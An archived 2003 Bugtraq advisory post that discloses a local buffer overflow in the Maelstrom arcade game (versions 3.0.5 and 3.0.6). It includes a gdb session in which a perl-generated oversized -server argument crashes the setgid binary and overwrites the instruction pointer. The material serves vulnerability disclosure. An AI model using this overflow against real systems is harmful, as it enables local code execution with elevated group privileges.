lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: 18 May 2003 13:52:04 -0000
From: Luca Ercoli <luca.ercoli@...ind.it>
To: bugtraq@...urityfocus.com
Subject: Maelstrom Buffer Overflow




Maelstrom is an arcade game. There is a buffer overflow vulnerability in 
Maelstrom which allow local attacker 
arbitrary code execution.

Vulnerable systems: Maelstrom 3.0.6
		    Maelstrom 3.0.5

Example:
 
[lucae@...ux]$ gdb /usr/bin/Maelstrom 

GNU gdb 5.2.1-2mdk (Mandrake Linux)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you 
are
welcome to change it and/or distribute copies of it under certain 
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux-gnu"...

(gdb) set args -server 2@...rl -e 'print "ABCD" x 9999'`
(gdb) r

Starting program: /usr/bin/Maelstrom -server 2@...rl -e 'print "ABCD" x 
9999'`
Couldn't resolve host name for ABCDABC......ABCD

Program received signal SIGSEGV, Segmentation fault.
0x41444342 in ?? ()

(gdb) Quit



Note: -rwxr-sr-x    1 root     games      171568 19 feb 
03:38 /usr/bin/Maelstrom   in Linux Professional 9.0



Luca Ercoli luca.ercoli@...ind.it


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ